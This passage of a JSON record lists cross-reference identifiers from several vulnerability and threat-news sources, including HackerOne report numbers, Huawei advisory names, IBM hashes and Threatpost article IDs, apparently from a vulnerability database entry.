"97F1C960-A343-5B1E-B261-4834CF80B790", "98F6C0C3-FC5E-5580-A148-55F2368B18C1", "99A0AA73-B93D-56EF-930D-4FD64A4F4D35", "9B0163DC-EE41-5E66-9AA8-A960262A2072", "9C3150AA-6C0C-5DC4-BEAD-C807FA5ACE12", "9C9BD402-511C-597D-9864-647131FE6647", "9D8C431A-57F3-560C-8146-1232C2C029C2", "9DAC062A-CFE4-5BB0-983A-8BAB512CF589", "9E16D977-AA24-57C3-9BD1-98296F3186F5", "9E4C737D-2D3C-5A43-B638-E131903225BC", "9E82678F-0559-56B2-94DC-6505FE64555C", "9F3ABA17-E33A-5018-9DCB-AECDD8DE9DEE", "9FE4ADCA-7F2C-505F-AE74-C635FF2CDF75", "A19F503A-900B-5929-8182-4BD7B1043185", "A1E14906-26B2-5DF8-95E3-07736CC5DDF2", "A24AC1AC-55EF-51D8-B696-32F369DCAB96", "A32F9E91-783B-5C20-9630-6A4E3DDA9AFF", "A39E4181-7C85-5B10-B0F9-AD286D09BD2A", "A454A9CC-C18E-56A1-B166-1A0E244E0493", "A4DD8B03-CBED-5284-83EA-6C21FE0EA21C", "A57FBD78-A654-5CEE-8291-163C8AFB7210", "A5B4FB6B-123B-544F-A4E4-46B0595C1C72", "A6308120-6A99-5D2D-A1F7-6384AC37959C", 
"A7CA20BB-BCF9-52C0-A708-01F9ADECB1AC", "A9A21055-01FA-5B3E-84B3-E294A9641418", "AAC2853C-A655-5E80-9262-A654102B874A", "AB801839-51E0-5EFE-B00D-ABBB6391399A", "AC9BE6BA-8352-57D6-80E3-8BB62A0D31C2", "ACB6C453-F1D5-5A65-91C2-DF455B997075", "AE0FE928-3464-53AA-BBD2-B3F9E871CEDD", "AEF449B8-DC3E-544A-A748-5A1C6F7EBA59", "AF45C6B5-246A-5363-8436-954018BD121C", "AF45D2D0-2D0E-5BD1-89DC-2E2C8E440A75", "AF93C0CA-BFDD-5C90-9D8D-55350790E1D1", "AF987350-FFD2-5814-AF7B-55862F1A8AFE", "B042A63E-E661-5B8E-9AA1-F0DEE4C18402", "B09C4EFC-2C66-5CA8-910F-E21D17B89608", "B16D26DB-D60C-5C0C-9452-80112720B442", "B20A08C3-E06C-57C9-998A-C38174AEA7DC", "B22E3A22-BF14-5660-977A-2D28D2AA2500", "B32ED3B3-2054-5776-B952-907BE2CBEED6", "B3DDE0DD-F0B0-542D-8154-F61DCD2E49D9", "B4A4F7BE-BF43-5BB6-A4A7-A22C6B9DDCA5", "B596B144-65DB-5863-8244-67AEE883C50E", "B5E7199E-37EE-5CBA-A8B7-83061DD63E3D", "B6987F3B-86A1-5FDC-AD92-EAF6D264C14A", "B7C1C535-3653-5D12-8922-4C6A5CCBD5F3", "B8D5B910-B397-520E-9526-FE32D86E93D8", "B992B3E1-DF6B-5594-8A16-ED385E07A24C", "B9A69678-D96F-528D-B436-366259B4A283", "BA280EB1-2FF9-52DA-8BA4-A276A1158DD8", "BA8F1657-CF64-574C-81BA-6432D5A351D4", "BADF55AF-60C5-5E33-BC19-5DC25FB9E196", "BBE1926E-1EC7-5657-8766-3CA8418F815C", "BBEEB41B-D67F-54B6-BA27-1956F83AAAC5", "BD1B0180-DA8D-5255-B3FE-EB6CBC730206", "BD33CC4D-EC56-5A22-A712-1B23F8FB141D", "BE2B1B45-11AE-56F2-A5B4-2497BAE3B016", "BE4B2B71-B588-5666-9A02-7855DBD45762", "BE66A9B6-104B-5F49-918A-8B913CE46473", "BF930E9B-ED2F-52A3-87ED-2082926ED9B1", "BFA4DC64-759A-5113-842C-923C98D12B44", "BFB49B3A-706B-5625-9899-54FCB1EE767B", "BFBBD550-B2CF-524B-87F6-D0A8980CDFD3", "C0A9F032-9822-59DC-94CC-20C15DEE0FED", "C0AE83D0-09A6-58EA-A244-1E453E699C04", "C14C47DA-F04C-56CC-955A-FF12A410D2F5", "C1878361-BBB3-5A2F-8212-945883518690", "C20BAC49-21F2-5BE4-B97B-2561BD95A1A8", "C306DCEF-59B3-5147-8169-3674490BD35F", "C3153E8C-0590-5D96-8EDC-AEE7E129246E", "C3C6029E-8A78-5C0B-9CF6-51489E455464", "C3DA2A71-DD68-5EF3-AC4C-5A10DECD333B", 
"C3E394AB-E22C-5A6A-B5AF-2A497DDAC7BA", "C45EBEA7-DE2F-5373-9AA5-334E20EA2D23", "C467EA51-59B6-5BEB-A634-62EFC2DC4419", "C5531AD4-9DFE-5A81-97D2-D34FD02E2AD6", "C58D4A9D-FE17-5F41-8B1B-800E327BB411", "C5B49BD0-D347-5AEB-A774-EE7BB35688E9", "C640B511-D1E9-5F57-964D-3826F1C68DF8", "C68080B0-3163-5E76-AD65-2B454DBB95EE", "C6C5DB3A-FC0D-58BE-B769-D097420B7716", "C72759ED-7C42-593C-A3C7-94E2CDB2B105", "C7617E51-4166-5517-879D-6385309E13D8", "C76F7089-967B-5A7F-B8DA-629452876A2A", "C772DCBB-20D0-51DD-A580-F96689E65773", "C7CE5D12-A4E5-5FF2-9F07-CD5E84B4C02F", "C7EE8D86-B287-50F5-B8C2-05E11E510900", "C7F6FB3B-581D-53E1-A2BF-C935FE7B03C8", "C841D92F-11E1-5077-AE70-CA2FEF0BC96E", "C87EF7D4-0E85-54CD-9D5A-381C451E5511", "C96865D9-B80D-5799-9EB6-DDF13650F0AA", "C98B31E5-B85D-50EE-9596-F00F1B89A800", "C9E3963C-74AF-51D2-ACF7-7687E92D049F", "CA408205-D32D-5A33-B1AF-0B863641C7FC", "CA625124-9F92-5FCF-83A7-3ECF5F0EBBFB", "CA8D6F85-3A73-5070-B9A0-3A47FAE2C784", "CB9B5FAA-47CA-5D85-91B9-0AC5179D527B", "CBCB527D-3C29-5E5B-8C71-D7F20AB001D0", "CBEB0168-C1C9-5A9B-8B92-83E1054E44EA", "CC4175EB-3B91-5ABB-A700-84FC1105AAD5", "CD8CABD7-BE65-5434-B682-F73ABA737C65", "CE477D7E-7586-5C82-8DCC-033C48461E66", "CF07CF32-0B8E-58E5-A410-8FA68D411ED0", "CF96C0AC-16EB-57DE-B450-775CC256F1C2", "D02E385B-76D7-5BDB-A49C-CE858BEB0009", "D0B02251-DCA3-58B6-B887-D339C4EAABF9", "D107A97F-1C44-59AB-8FFE-803D1DC21EA3", "D178DAA4-01D0-50D0-A741-1C3C76A7D023", "D1E393B9-589D-5A20-8799-0F762FD361DA", "D21F1D28-2C44-5969-8F84-E5C6FF67DCFC", "D2602292-4969-564A-915E-2EFC6661FA35", "D298A3C8-E215-5549-B1A0-D01215070203", "D359E448-87C6-5DAB-AC08-9E7782F4EBD1", "D3C401E0-D013-59E2-8FFB-6BEF41DA3D1B", "D4220876-A611-59AE-8262-07797542DAB9", "D5003B3C-B1D9-5840-816F-1AFEBCAC7FD3", "D536CD4F-33F2-570F-BA34-54E141F1132C", "D64C04EA-093F-5924-A39B-714908D4637E", "D6AC5402-E5BA-5A55-B218-5D280FA9EA0D", "D6EE5F29-18C9-5E59-B9E2-01DC93F5ACE9", "D72095BC-06C5-50B2-8F66-EC86811783D3", "D77DEF60-6E7D-5708-B9F2-DB4EA3E38C23", 
"D77EE79D-71A5-51BA-9A16-DC757F86CC50", "D7D65B87-E44D-559F-B05B-6AED7C8659D5", "D7D704DD-277E-5739-BD5E-3782370FCCB3", "D813949A-183D-55ED-AF64-B130B8F95A56", "D8246B9C-AC86-5FFA-AA8F-4419E4CD07F1", "DA01F84A-9B1D-5337-A465-2A9AB088C056", "DAB5D6B4-8A2D-58C0-835F-DA4F27B2142D", "DB81B174-C3E8-5B08-80E4-A6D768400C4A", "DBBD6963-3870-5117-A829-3DE976AE90E2", "DC044D23-6D59-5326-AB78-94633F024A74", "DC2A0BD8-2ABF-5885-957D-0FA3B058665C", "DE88B6AE-5D54-5B49-A097-57038C720463", "DEC5B8BB-1933-54FF-890E-9C2720E9966E", "DECBAC7B-9235-5E00-81C1-142CD41306FB", "DEE433F2-3A1C-513B-AE6B-E11EFFB5A8E4", "DFB437A9-A514-588D-8B48-A6C7C75EAD32", "DFF2F784-9ED2-50EF-B79E-3EBF5A9B5428", "E0452D6A-51BC-51F5-9C1C-6CF01DA2805E", "E0A2EF02-5087-5522-ABA0-52F4142BB87B", "E1457E6C-87A3-5557-A3F2-175005D2A765", "E1ABFD41-98C8-576F-8509-5541B40FD442", "E278D22E-7EC5-5A63-ADFC-EDEFDC650AA1", "E4103A50-881C-52BB-86CC-27F549B798E9", "E4491698-477C-599A-A65D-EBA7441764E9", "E458F533-4B97-51A1-897B-1AF58218F2BF", "E4E73A91-5275-59C0-AB2A-7F3EE83DDE28", "E59C9A70-6F3E-5CF6-9F15-B0039E0FBAF1", "E655806B-A2A8-5BCB-A30A-0120CA3E97A6", "E6E03693-50B8-5AB4-B766-8464A228BA02", "E981B35D-7356-5A5A-963A-744545A4E51C", "E99EC1B8-78FB-51D7-A94A-F8B504DFBEF5", "E9B21C59-ED98-5B3B-A993-F1C214F8796C", "E9DFB8EA-B99D-5022-ACE6-5A42D0D6A350", "E9F25671-2BEF-5E8B-A60A-55C6DD9DE820", "EA1AF0D9-1E6E-5080-BB7C-9D6035795FFB", "EA3173CE-C426-5047-864A-480B1A30F235", "EA3C5D7E-0CC8-5AEC-8D7F-3C245A834DDA", "EA906824-9149-507D-893C-87A7FED8998B", "EB648301-A198-5E4A-A72E-9639ED09F6C9", "EC0987E2-0001-5D63-A5AF-09675A5915BD", "EC35769F-2EAD-5464-8F97-D90F768E1E2D", "EDDA4558-9527-5BDE-86E3-23DDD0BA5443", "EE01D764-5F14-5C0A-BD77-8E32854C5216", "EF37F62F-1579-535A-9C3E-49B080F41CAC", "EFD098FC-90C8-5665-98B7-79C96C6AEBAE", "F00E8BE4-12D2-5F5B-A9AA-D627780259FB", "F085F702-F1C3-5ACB-99BE-086DA182D98B", "F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E", "F1CA855B-967C-5A5E-9256-FDDE87702713", "F1D342BE-E1E0-5B33-A19B-E2EB9E3E7C80", 
"F1E9BE6D-4024-56FB-80BB-B10ED5889144", "F208D311-79CA-5A2C-AE81-591BA4D30750", "F2F2719B-7041-5D1A-A95A-7617360B1D08", "F32DF396-0485-5F43-8A52-31B8DD252790", "F388C84A-40DA-58BC-BE0A-74C7E1712C54", "F3A40027-6DB5-509C-81CF-473DE3BEF46E", "F3D43FE5-47AE-591C-A2DD-8F92BC12D9A8", "F472C105-E3B1-524A-BBF5-1C436185F6EE", "F493C59E-F2A7-52D1-B4B5-69CD3748C5E9", "F4C136DE-892B-5921-8475-E30BD548DDBB", "F50E9F2C-8C80-5A76-A993-A3E42414D797", "F523E799-3659-532F-8EED-40AD7F79E752", "F5339382-9321-5B96-934D-B803353CC9E3", "F594470D-2599-5B2E-B317-C9720581C07D", "F7994B92-2846-5644-8B68-EFB6DFB95ED2", "FB593988-2CFC-5828-8229-9274AC7B0F86", "FB65C479-F4E7-58BA-BC4A-AED04F10A11C", "FB83113C-AABD-5893-8DDE-332B57F4FDD4", "FC661572-B96B-5B2C-B12F-E8D279E189BF", "FD364396-D660-5D23-8323-23248A5108C5", "FD65F47A-0B60-5F08-BFC2-1ABD16F49781", "FE8572DF-42D4-521C-B3DC-4715C2F9240D", "FEFA5AE8-5C94-5174-B44C-AC52B9AEAEAD"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:3B4F7E79DDCD0AFF3B9BB86429182DCA", "GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "hackerone", "idList": ["H1:1119224", "H1:1119228", "H1:1423496", "H1:1425474", "H1:1427589", "H1:1429014", "H1:1438393", "H1:591295", "H1:671749", "H1:678496", "H1:680480", "H1:695005"]}, {"type": "hivepro", "idList": ["HIVEPRO:09525E3475AC1C5F429611A90182E82F", "HIVEPRO:0D02D133141B167E9F03F4AC4CA5579A", "HIVEPRO:0E3B824DCD3B82D06D8078A118E98B54", "HIVEPRO:10B372979ED5F121D7A84FB66487023E", "HIVEPRO:1825C4046C6054693C41D7D5DFD7BA10", "HIVEPRO:186D6EE394314F861D57F4243E31E975", "HIVEPRO:205916945365E4C9EB9829951A82295A", "HIVEPRO:310F7AA9457FF55D42E100B468844E6D", "HIVEPRO:5339CBE01BD312A79B81CAAEE0F3B32E", "HIVEPRO:57EAE0D1FD9EA88C12142AFF641985C3", "HIVEPRO:8DA601C83DB9C139357327C06B06CB36", "HIVEPRO:92FF0246065B21E79C7D8C800F2DED76", "HIVEPRO:B25417250BE7F8A7BBB1186F85A865F9", "HIVEPRO:B772F2F7B4C9AE8452D1197E2E240204", "HIVEPRO:C037186E3B2166871D34825A7A6719EE", 
"HIVEPRO:C0B03D521C5882F1BE07ECF1550A5F74", "HIVEPRO:DB06BB609FE1B4E7C95CDC5CB2A38B28", "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093", "HIVEPRO:E9C63D0D70D3232F21940B33FC205340", "HIVEPRO:F2305684A25C735549865536AA4254BF", "HIVEPRO:FD730BCAD086DD8C995242D13B38EBC8"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20201105-01-NETLOGON", "HUAWEI-SA-20211215-01-LOG4J"]}, {"type": "ibm", "idList": ["004795EC88EC224A6BFB93940B96344B4EB9FAFDD91D056225AB0FB24FFE6CFE", "00B8C97EE29C4817481434B7FD887049A0EA42C49E5514E1877ED97B5322DB16", "00CA973D0D5F4A08ADB77D27F66CF53D661D1B67B8DA263B3CE4522918A4CFFF", "0172701FE5FE7C060372C9A6E7199B0E91A4F7E5904E7762F54202A8D4CB9759", "01C1A66F149F6CC650556CCBE7E381780D3142691366A6B6EFBC8CD5C674BD4D", "023C54E1D297D5AA9E7F44F8089DE35CB079281FA1776467BF8B7A7AD4FE252E", "03991456EAB03B09B39DC9DB5C8BE4A51167523943AA9AE61168FCD6FBACC80B", "03FB798F067FAF41EB009C69979886C89AC88567ECBC9DAD159CDC2AB547C1F7", "048C762AAACAFC74604EFAB15A41479F902FA040758DF428CB364B0242E01EE5", "04D3658F043D6F4A2AA1B2F519A7E89C112641C7C4E2E58E14BEC11BA66E803D", "053134070CB8D6609B7F157DC74146FFBCB3EBE941406A677E889C3CAF773364", "05A1D58708802BF8C1674EE32BEC4344254929330218CAD68AA838AA7F549BF7", "05BBDE1FB03AC43275CE3464D408E5E21E63D250E7B0CF0E90D314FBD5991752", "05C0F0FFAAC20F511D50030C8EC7ECBE67EB162A7352C90C63F986E1F73F829F", "05C433115EE2DEF62DD69CA7C7E97FF424FB6D815F82B8FFDD0435DD323AC60F", "05DC2B42328B1D8271D4FF358EC4A58529E6A6A6B8D7E154A691EFE1CCE81D1A", "07F48EB2EFD881D21294E1AFEEE704414B9605E4B9B1F4BF6C82B1917372C2B8", "084618FE115DBC963CDA469EFDF156D77B5FAF5BE04B99575716D75AE5C42F9B", "08493CBA8B1A8F34C7786760C52C7997B8AE1C300A4CD3A03EEF9B528175E0E6", "08803B708D4CA95FF8DD68A4DE7FBE7DEAA67387194E25D8CD693B135E7332D9", "08FF14BF18D2D8DEA2BCD9900A4BED9C481C9700F7CF99B6CD1B3F7EDA9C3865", "092A442A77CDFE46ED83F2F7A7AEC07007442443AE7B6D28BB557D1A8FE3BBB2", "09E2EB771A00246F88812FA7239EC135B4D760017A61975C9C7DFACAB2B566B3", 
"0A50FDB1D7E17C09815A2D06C237539FFD67E23789BDD9A730E5EB3DD9473349", "0A6CCE42A31E930F28AFDE0602BBBC571E0114C6DE44000B246AC3D8A844DE39", "0AE80E7D1B92F5584C0652988A6BC58F1CE1E37349CB543C23A7BCE8C2445CCD", "0B0C1C8C8CE115B4178E3F36D545ECA410D6199928FD71C89DC4DE93BB9DDD9F", "0B7D327E5943F8BAC5B2E5CC855F0062D08A51BF03FA3BB29C4B6E081796EE73", "0C1804CEEC31BC3891CD11D25C3FF5366F208C6C862263628223F5F36164CF5F", "0C5DF0032AED817AD90450244E2BACA3580BEA79A5DBA7B84BC329B4F1B22585", "0D6234D366BD8E5B02C4B7507046A503B63D0B4B38E06DEEBC5B6B98A5E2C80E", "0FEC88A4274D91DBFBCE46AE5EAF1CC67B908E3D943BD3504E2985D9090BF93C", "0FEF4738C59C97322DBD25A9806D1EE3E131F117AF9CA9C33F3A6098A981AE66", "10DF4536D86919652FFFFF08E8AC284AF696E6684CAF921DD9F5AB335A3882A9", "10DF54AA6E02F56E5A696B90CA92AA8E0E7F033CECD731E6AF976A827BD42316", "11FEAADF6A94DFB6615A82EE0023D346C418ECD114C445A6BA52D50AA2C6FE0B", "127C76472291CDD3CB521ED83F3C5EE611A0DBD9FFDB39D76C830FEB168F09A4", "129CE78870CF5A56320BA28A8E839DC00636BEBEF434ACBBC173D76B086059A6", "12B5FC796651D7A35DCF3B8B99675B867D7E526A689762A16A5B6315936577BB", "1310B3EFA1CB8221444DBC5BA49E64CF94DE9CAEC7263EBE35877FDC59E5AC3F", "1344237EA4CB2FC0E4E886077C19B07F9DB7272438002709C5CF339D588A226A", "13F541CB7E471297DBC119C027DC6613DDB93B7E6EC8CAAB1918D4F75B9B0A25", "1449AEBCE14C7A0A52FEC9AC77DB499F51B4D1779EECBB859DE1E3343B21DE81", "1564B346628009160A0396828F83A178C5F24808FA0E2904A4DA0F9DD72C42DE", "15A287A106B845D07333D01887C3D8023917F0A2AED2934387D8904CA8A42DA3", "1629CA1DFD389EEFF25556E8C9B707086E571E474449820E949D944C6EB994C3", "1718BBC548F6B9290910114BC5C00A77714052D125CB0F46088F37430F68E717", "1827A1B8985F4A2B91EE262D4C17EF01B71CFEA86DB0A386BD1C1B098E2F4B69", "18433120583E82C639DDC6BF1D76EF365C9C500B0A9CC0AE663BA4BE32DC9232", "18578ECA481CB003C14A84CA7A47ACA060F579C24F4075A776AF26B575502960", "185EAAB4DDC8472DF44603A1F8F5361C61E9CD92D640BE3D1EC6D31AE959C4F0", "18A5E6C2581806177DE446AE26FCBC2EBB616C29B40041253F318FF51CE1AFB5", 
"19613990614CDAB7F34154F3A620BBF18E7F15F79F3D35FBEB7EC2FC9249AD2C", "198E2723EA7A1CE1B7B95165E39923D5EC8AC5F2D17849CEEDD3695D8CF40623", "19BDC8BC083D06551FAAFFE502D5430968A9B28E5C71827BCFA873F30BA60815", "19DD6BC826C8BB8D144E5985E9EA9E8E00533CC7AEA127F00BAC78AFBE98ED00", "1B24B80EE0365FFF7DD17D658867C0FAF5A2D298D0CEFC01C750A9D3A2948965", "1C6CC8129E7AEC5C314CCFD7570FC09548438820946E9774FD2E2410C0897958", "1CF787D3495FD84D3FB0E74685765A4270075CE576D888A960036582B4F83133", "1D2ACD2E26FAAB07F4713510046DB56AE9A2584306D1B3C884E18DC47771F892", "1F4AD6C45C3008DFF01BE9EE1718E1541E761D5A4D77198ECEBE3A97CBCEF6FA", "1F7D1DABE3F10F804A14788D638556B04F5D5038E1088B9F38B3961987623815", "2042D81324560EA3A6747DAF5E2633EFD4EC3C4BB62989E7EF2C6A1F73035677", "207BA1F7EAE0F24909102A8E9F71F4E090F16E370A882E1CE68B1B6EFB5952F4", "209DDCAB6F475A868DA84DD19D31132027FF62B259B6541CA0C9859AD7CF6ED3", "231A52BDE442B2AB4C8738E8A5DA147B21BA8A7C7B8F0AE7764349AD467647ED", "23532FC7488A1E0A5525D86FA8B58841ED6086B69C02A7FBB104B3F98E2ED3CE", "23AE54815D4CF73296F6842E5DC0E74807A9DBD435A1F78F1FCEB4A6582B9613", "256D7977365CD514F903FC0D0240FD89D47444B078D35EB3DA4DD54AAC8C8661", "261D21204C9E2060DE70CAB5932236C5EFB2EE37E8BD5A2C64CC6F1DFE9C5D11", "2709A19D29B9047D230E570EBF5F26A53D322D557D88CBCFB480F1AFEEF6797C", "28932A2B46E12EA86EB64762E53A114C7EAE97254E4818FFBB7E3706DCBD4C0F", "29D0DF01470BDC8419B05A248E7472C3D66A25942620A36BE340FC58780F85D4", "2C91E3B2FEF04BCEF23F12290F03A43D58EEE4E79946072B4CD9E132F31D3891", "2E43FFB94818B9FA5C94DA88B4D321908359974CB3975DC266C2CC995ACB39F3", "2F83AABA00B663AFEF63A77633BECC48724170228D80CF284B2FA6A8E71FE2F8", "3013E3EDD3900D973C5458C7115888BA961C479A9EB9DA6399CA9B389B37A68A", "30495EE9B3C48AB51AC589D2A5956D977474A3BCCB9A67B54801DEE7685C5573", "30B9050919D7C39431AC5338C16936C21A40D07623E5A2722246A5F91B5C6781", "30E9FB4250193CA2C5AB02F5095C96F34F2044E06280324E18E38EEFD7C1490E", "31818542FEE3EBA05F196E3245AADB3A27506A9391A7E39DC666A3A5AAEE4963", 
"3220BFD68D0CE5B97E4EC49AFAD94FC9317DA5DFDBD73C624B022C3E93AC4268", "342C70DE6943237DCB4E2BCA66A117A8AC4A929DA3631A2BB88E27D99C1A1F68", "34A1BC83BF19906C7B478BA74801364559DCACB160B8635E7EB96D184FEF89D3", "37EB0FBFC18EAA8CBA405BA4A0486007287891F661D591E70F8DFD893065763F", "382442D01890BE0F397DB0132A6B09339C6A137724C837A5E2907ACB61EA374D", "3976D01F8C3788737A665B8B2C67DBBC91A5E249602308AB620D7FB7082293F3", "39C439A440712A8825FAF249AE9256D154F422331B554EA4FEF0A1953F90EEE0", "3DD98F75D577A590F9C6B1044AA5212C3724660A7C7FB06B6DA4B25B95BAE35A", "3E89F6F868ACED4017A55BB54A40658D10E6704003F50ACBCE289C1637B41045", "3F22D484EEB21B0ECFBCEC72BC808CC13691870E90AFA5724963DAB7B31EAE45", "3F4820A3C64022355AE6B658B22CB04D75AF98980AA0D9E31E518E440502939E", "40793F706E8E7D40E73D53F66523BA8AE8718C40C00FCEF117CE8DEAC4566FD6", "4204EAC341D63510AAFE13D5F22BA14E92396D43569176E371BFB452611D1A97", "425F5D6A5626B05313A3861482065BCFD009527D181E2BC17663ACBA680F983D", "4271B86469CFCE465E783BEC3C9F3EDD13D645F55A5BEB697F3A4FCF694E568B", "42CCD08061313E58CD6A73C8392806C80452EF564A9B5297EAD78887E47150D7", "42E2A358194D10969A587E1619263DAF26CB9ED7B107D2DF24882326792073A6", "42EDAFE6D8936EF20A9D2196EA720167F87C6E003FF3677093C777BD76F87321", "4444CE19278AF3B6D6D733CB7C56652494A379ADDF5788A2D704DCF2AF8B12B6", "4490A508C76B3478285658D50CD1591EE7BF09C6C6CB543CD3B4AD02093F6106", "472B90C1832448CA528B9FB0B6A4E81CAB1388397DE753F5CD640C5D7396EC9B", "4AB0975E08BC56107FE408EAB5B5BE88E706B439236C7F566A37398C9C1E0CCB", "4AE1D41640E1E1F9FB5DBE7DBF0EE0C2ACA27C0ECF4C914440CCDB95D27308F5", "4AF3F2925FA2FAC4247303F748E1EABFA2DFEF4045F7C3DA1E06B8C833F40639", "4C80B96CCF860D1EC965D20D607161A663C8FEDCCC81B5243439A21264518261", "4D6D019876F2EE83F308FCD9E27F7FE176603A605EC9CDF1DBCD5C5C9951EDE5", "4DCA21B56FE99A5E5A697112CA49F4F2144DF92AA26A0776EAADF3EDAC9C9053", "4E45A4CCE496D5E81C322B32A8275068E422B799EBDE7BAED299E58F52295C89", "4E7048D2949BF25810D29EF0126BEB63CEE9FB2EFA940D8D15F1A2EA9579215D", 
"THREATPOST:1309DBA0F8A2727965C6FA284A002D3B", "THREATPOST:1322630273A25CA5A68246679553E2B8", "THREATPOST:138507F793D8399AF0EE1640C46A9698", "THREATPOST:138F67583DAC26A61D1AB90A018F1250", "THREATPOST:13D4AE4C03A3BF687491FDA1E8D732C7", "THREATPOST:142DAF150C2BF9EB70ECE95F46939532", "THREATPOST:14D52B358840B9265FED987287C1E26E", "THREATPOST:1502920D4F50B0D128077B515815C023", "THREATPOST:1606F3DA3AAD368249E36D32FC2B8079", "THREATPOST:16624FA0DF55AAB9FDB3C14AC91EC9F5", "THREATPOST:16877B149E701CC4DB69E91C567D79CC", "THREATPOST:187B01687ED5D3975CD6E42E84DD9B13", "THREATPOST:18C67680771D8DB6E95B3E3C7854114F", "THREATPOST:18D24326B561A78A05ACB7E8EE54F396", "THREATPOST:1925DCFAF239C5B25D21852DB978E8E9", "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "THREATPOST:19BDD881931703B28F7B93492E0C75FD", "THREATPOST:1A553B57472BB0EB8D69F573B510FDE6", "THREATPOST:1B1BF3F545C6375A88CD201E2A55DF23", "THREATPOST:1B42481449E86FEA3940A2E1E2634309", "THREATPOST:1BE6320CDA6342E72A5A2DD5E0758735", "THREATPOST:1CC682A86B6D521AD5E357B9DB3A1DFB", "THREATPOST:1CEC18436389CF557E4D0F83AE022A53", "THREATPOST:1EB961A6936CB97E2DE6C0212349367F", "THREATPOST:1F99A9A6A418194B87E5468CC8344FBF", "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE", "THREATPOST:20F9B8CE2D092108C0F78EC3E415F6B4", "THREATPOST:2188E3E33D86C2C3DF35253A3ED7FA6C", "THREATPOST:21FB6EBE566C5183C8FD9BDA28A56418", "THREATPOST:2243706D17F2A1E930A00F49D8E30720", "THREATPOST:2246F7085606B44A031DC14D1B54B9DB", "THREATPOST:22663CEB225A1F7F9DD4EBD8B84956C1", "THREATPOST:23B6C10D7EF469BE8ED27D1C9AFB526A", "THREATPOST:23D55C85EA8B442C858FF058C5E25DBC", "THREATPOST:247CA39D4B32438A13F266F3A1DED10E", "THREATPOST:24AD38597408C4E7757770D45345AEBA", "THREATPOST:2707644CA0FB49ADD0ECA1B9AFDA0E8A", "THREATPOST:27150C099FB4771B9DED4F6372D27EB7", "THREATPOST:27C5AA551B5793DEA8848FB76DE52B32", "THREATPOST:280ACEC9B5A634E74F3C321F272C3EF3", "THREATPOST:2BD1A92D071EE3E52CB5EA7DD865F60A", 
"THREATPOST:2BDC072802830F0CC831DE4C4F1FA580", "THREATPOST:2C0E12580D3C2F1CE7880F6955D4AA1E", "THREATPOST:2DFBDDFFE3121143D95705C4EA525C7A", "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "THREATPOST:2F655C93B7912A7C776E1DC1D39822D0", "THREATPOST:2FE0A6568321CDCF2823C6FA18106381", "THREATPOST:305513A61FA2B0EF500854C82DF34A9C", "THREATPOST:30D70449EF03FFC5099B5B141FA079E2", "THREATPOST:31091088EDBCEEF43F75A2BA2387EB5C", "THREATPOST:31D14CEE5977BF71F79F7C30AEC10698", "THREATPOST:33026719684C7CD1B70B04B1CFFE2AEB", "THREATPOST:333795A46E195AC657D3C50CFAFE7B55", "THREATPOST:34CC110D7F26B1B4D3B97BE05F000B69", "THREATPOST:34D98758A035C36FED68DDD940415845", "THREATPOST:35A43D6CB9FAF8966F5C0D20045D1166", "THREATPOST:3697F9293A6DFF6CD5927E9E68FF488A", "THREATPOST:38E044431D55F0A4BC458FF92EB025BF", "THREATPOST:38E8D69F26ADB15A989532924B2A98C4", "THREATPOST:3A1C8593C0AAEFA3AF77D1A207BD0B65", "THREATPOST:3A5F59D56E40560C393A3F69A362A31B", "THREATPOST:3ADFDD3CC93B03F83C2CEC5583B016AB", "THREATPOST:3B06E49AA3C9F001C97038682A9BF73F", "THREATPOST:3B8B02F621E9D9883A541B1B26BDF410", "THREATPOST:3CC83DBBAFE2642F4E6D533DDC400BF6", "THREATPOST:3DB85AFFEA9491ACBD8909D0CF5FBAEA", "THREATPOST:3E47C166057EC7923F0BBBE4019F6C75", "THREATPOST:3E89058B621DF5B431A387D18E4F398C", "THREATPOST:3EDC338ECB2601F5A49A9ED5E087B776", "THREATPOST:3FDED0EC415BA165368B72AB2A8E1A59", "THREATPOST:40A09F08F388BACF08E0931C6473DE0C", "THREATPOST:40A6B1288BA6177BA30307804BE630D0", "THREATPOST:41B10746D1F4B74DA188CB140A8B2676", "THREATPOST:420EE567E806D93092741D7BB375AC57", "THREATPOST:42AAB266C740220CFF57204DDF71129E", "THREATPOST:436D209F4CB01B99FC9576DFE08DE145", "THREATPOST:45B63C766965F5748AEC30DE709C8003", "THREATPOST:45F91A2DD716E93AA4DA0D9441E725C6", "THREATPOST:46837E7270195429E1D891848E911254", "THREATPOST:46AF5D5C752ADF689DA52FBDA4644F5D", "THREATPOST:47481707E9A4BF7FC15CC47EC8A8F249", "THREATPOST:48A631F2D45804C677BB672F838F29DA", "THREATPOST:48FD4B4BFA020778797D684672C283B0", 
"THREATPOST:49177F7B5015CE94637C97F64C2D4138", "THREATPOST:49274446DFD14E2B0DF948DA83A07ECB", "THREATPOST:4B2E19CAF27A3EFBCB2F777C6E528317", "THREATPOST:4B8076F30D5D67336733D7FFBCBD929A", "THREATPOST:4C22D22EF8F65F5DA108A15C99CB9F55", "THREATPOST:4C9E0FFA5C914E395A66D2DC65B16649", "THREATPOST:4D0DF8055D2BC682608C1A746606A6E4", "THREATPOST:4D63851D1493E3861204B674ADBC7F01", "THREATPOST:4D892A0342695D6703703D63DCC1877C", "THREATPOST:4DD624E32718A8990263A37199EEBD02", "THREATPOST:4EEFA1A0FABB9A6E17C3E70F39EB58FE", "THREATPOST:4F1C35A7D4BE774DF9C88794C793181D", "THREATPOST:503327A6AB0C76621D741E281ABCFF77", "THREATPOST:51A2EB5F46817EF77631C9F4C6429714", "THREATPOST:52923238811C7BFD39E0529C85317249", "THREATPOST:54430D004FBAE464FB7480BC724DBCC8", "THREATPOST:5531DA413E023731C17E5B0771A25B3D", "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "THREATPOST:57F52943964BADEBC748C4AC796CEEB6", "THREATPOST:590E1D474E265F02BA634F492F728536", "THREATPOST:5B680BEF3CD53FFB3B871FF7365A4C47", "THREATPOST:5B9D3D8DB4BFEDE846215C1877B275ED", "THREATPOST:5C1E777F8F9FC173EF97E95D8AFAA5F2", 